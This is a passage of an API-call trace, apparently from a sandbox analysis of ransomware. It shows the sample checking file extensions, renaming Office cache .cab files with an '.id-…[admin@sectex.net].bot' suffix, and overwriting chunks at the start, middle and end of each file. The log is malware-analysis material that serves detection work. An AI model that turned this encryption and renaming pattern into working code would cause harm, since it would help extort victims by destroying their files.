	[0036.209] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0036.209] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79
	[0036.209] lstrlenW (lpString=".jpg") returned 4
	[0036.209] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0036.209] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0036.209] lstrlenW (lpString="OutlkLR.cab") returned 11
	[0036.209] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0036.209] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=14819276) returned 1
	[0036.209] CloseHandle (hObject=0x188) returned 1
	[0036.209] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab")) returned 0x2020
	[0036.209] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.209] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0036.210] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0036.210] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0036.210] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0036.210] ReadFile (in: hFile=0x188, lpBuffer=0xb2d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb2d0058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0036.224] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x4b5fee, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0036.224] ReadFile (in: hFile=0x188, lpBuffer=0xb310058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb310058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0036.228] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0036.228] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xde1fcc, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0036.228] ReadFile (in: hFile=0x188, lpBuffer=0xb350058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb350058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0036.252] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.252] WriteFile (in: hFile=0x188, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0xa7dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfcb0*=0xc0102, lpOverlapped=0x0) returned 1
	[0036.746] SetEndOfFile (hFile=0x188) returned 1
	[0036.746] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb748
	[0036.750] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0036.750] WriteFile (in: hFile=0x188, lpBuffer=0xb4fb748*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb748*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0036.751] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x4b5fee, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0036.751] WriteFile (in: hFile=0x188, lpBuffer=0xb4fb748*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb748*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0036.751] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xde1fcc, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0036.752] WriteFile (in: hFile=0x188, lpBuffer=0xb4fb748*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb748*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0036.753] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb748 | out: hHeap=0x7d60000) returned 1
	[0036.753] CloseHandle (hObject=0x188) returned 1
	[0039.647] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0039.648] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74
	[0039.648] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74
	[0039.648] lstrlenW (lpString=".doc") returned 4
	[0039.648] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0039.648] lstrlenW (lpString=".docx") returned 5
	[0039.648] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0039.648] lstrlenW (lpString=".pdf") returned 4
	[0039.648] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0039.648] lstrlenW (lpString=".xls") returned 4
	[0039.648] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0039.648] lstrlenW (lpString=".xlsx") returned 5
	[0039.648] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0039.648] lstrlenW (lpString=".ppt") returned 4
	[0039.648] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0039.648] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74
	[0039.648] lstrlenW (lpString=".zip") returned 4
	[0039.648] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0039.648] lstrlenW (lpString=".rar") returned 4
	[0039.648] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0039.648] lstrlenW (lpString=".bz2") returned 4
	[0039.648] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0039.648] lstrlenW (lpString=".7z") returned 3
	[0039.648] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0039.648] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74
	[0039.648] lstrlenW (lpString=".dbf") returned 4
	[0039.648] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0039.648] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74
	[0039.649] lstrlenW (lpString=".1cd") returned 4
	[0039.649] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0039.649] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74
	[0039.649] lstrlenW (lpString=".jpg") returned 4
	[0039.649] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0039.649] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74
	[0039.649] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74
	[0039.649] lstrlenW (lpString=".doc") returned 4
	[0039.649] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0039.649] lstrlenW (lpString=".docx") returned 5
	[0039.649] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0039.649] lstrlenW (lpString=".pdf") returned 4
	[0039.649] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0039.649] lstrlenW (lpString=".xls") returned 4
	[0039.649] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0039.649] lstrlenW (lpString=".xlsx") returned 5
	[0039.649] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0039.649] lstrlenW (lpString=".ppt") returned 4
	[0039.649] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0039.649] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74
	[0039.649] lstrlenW (lpString=".zip") returned 4
	[0039.649] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0039.649] lstrlenW (lpString=".rar") returned 4
	[0039.649] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0039.650] lstrlenW (lpString=".bz2") returned 4
	[0039.650] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0039.650] lstrlenW (lpString=".7z") returned 3
	[0039.650] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0039.650] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74
	[0039.650] lstrlenW (lpString=".dbf") returned 4
	[0039.650] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0039.650] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74
	[0039.650] lstrlenW (lpString=".1cd") returned 4
	[0039.650] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0039.650] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74
	[0039.650] lstrlenW (lpString=".jpg") returned 4
	[0039.650] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0039.650] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0039.650] lstrlenW (lpString="Proof.cab") returned 9
	[0039.650] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0039.651] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=11482605) returned 1
	[0039.651] CloseHandle (hObject=0x188) returned 1
	[0039.651] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab")) returned 0x2020
	[0039.651] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.651] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0040.241] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0040.241] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0040.241] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0040.241] ReadFile (in: hFile=0x188, lpBuffer=0xb2d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb2d0058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0040.247] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x3a674f, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0040.247] ReadFile (in: hFile=0x188, lpBuffer=0xb310058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb310058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0040.251] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0040.251] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xab35ed, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0040.251] ReadFile (in: hFile=0x188, lpBuffer=0xb350058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb350058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0040.269] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.269] WriteFile (in: hFile=0x188, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0xa7dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfcb0*=0xc00fe, lpOverlapped=0x0) returned 1
	[0040.633] SetEndOfFile (hFile=0x188) returned 1
	[0040.633] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0040.633] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0040.634] WriteFile (in: hFile=0x188, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0040.634] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x3a674f, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0040.634] WriteFile (in: hFile=0x188, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0040.637] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xab35ed, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0040.637] WriteFile (in: hFile=0x188, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0040.639] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0040.639] CloseHandle (hObject=0x188) returned 1
	[0042.851] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0042.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81
	[0042.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81
	[0042.852] lstrlenW (lpString=".doc") returned 4
	[0042.852] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0042.852] lstrlenW (lpString=".docx") returned 5
	[0042.852] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1
	[0042.852] lstrlenW (lpString=".pdf") returned 4
	[0042.852] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0042.852] lstrlenW (lpString=".xls") returned 4
	[0042.852] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0042.852] lstrlenW (lpString=".xlsx") returned 5
	[0042.852] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1
	[0042.852] lstrlenW (lpString=".ppt") returned 4
	[0042.852] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0042.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81
	[0042.852] lstrlenW (lpString=".zip") returned 4
	[0042.852] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0042.852] lstrlenW (lpString=".rar") returned 4
	[0042.852] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0042.852] lstrlenW (lpString=".bz2") returned 4
	[0042.852] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0042.852] lstrlenW (lpString=".7z") returned 3
	[0042.852] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0042.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81
	[0042.852] lstrlenW (lpString=".dbf") returned 4
	[0042.852] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0042.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81
	[0042.852] lstrlenW (lpString=".1cd") returned 4
	[0042.853] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0042.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81
	[0042.853] lstrlenW (lpString=".jpg") returned 4
	[0042.853] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0042.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81
	[0042.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81
	[0042.853] lstrlenW (lpString=".doc") returned 4
	[0042.853] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0042.853] lstrlenW (lpString=".docx") returned 5
	[0042.853] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1
	[0042.853] lstrlenW (lpString=".pdf") returned 4
	[0042.853] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0042.853] lstrlenW (lpString=".xls") returned 4
	[0042.853] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0042.853] lstrlenW (lpString=".xlsx") returned 5
	[0042.853] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1
	[0042.853] lstrlenW (lpString=".ppt") returned 4
	[0042.853] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0042.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81
	[0042.853] lstrlenW (lpString=".zip") returned 4
	[0042.853] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0042.853] lstrlenW (lpString=".rar") returned 4
	[0042.853] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0042.853] lstrlenW (lpString=".bz2") returned 4
	[0042.853] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0042.853] lstrlenW (lpString=".7z") returned 3
	[0042.853] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0042.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81
	[0042.853] lstrlenW (lpString=".dbf") returned 4
	[0042.853] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0042.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81
	[0042.853] lstrlenW (lpString=".1cd") returned 4
	[0042.853] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0042.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81
	[0042.854] lstrlenW (lpString=".jpg") returned 4
	[0042.854] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0042.854] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0042.854] lstrlenW (lpString="InfLR.cab") returned 9
	[0042.854] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0042.854] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=18874884) returned 1
	[0042.854] CloseHandle (hObject=0x188) returned 1
	[0042.854] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab")) returned 0x2020
	[0042.854] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.854] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0042.855] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0042.855] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0042.855] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0042.855] ReadFile (in: hFile=0x188, lpBuffer=0xb2d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb2d0058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0042.862] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x6000ac, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0042.862] ReadFile (in: hFile=0x188, lpBuffer=0xb310058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb310058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0042.869] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0042.869] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x11c0204, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0042.869] ReadFile (in: hFile=0x188, lpBuffer=0xb350058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb350058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0042.886] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
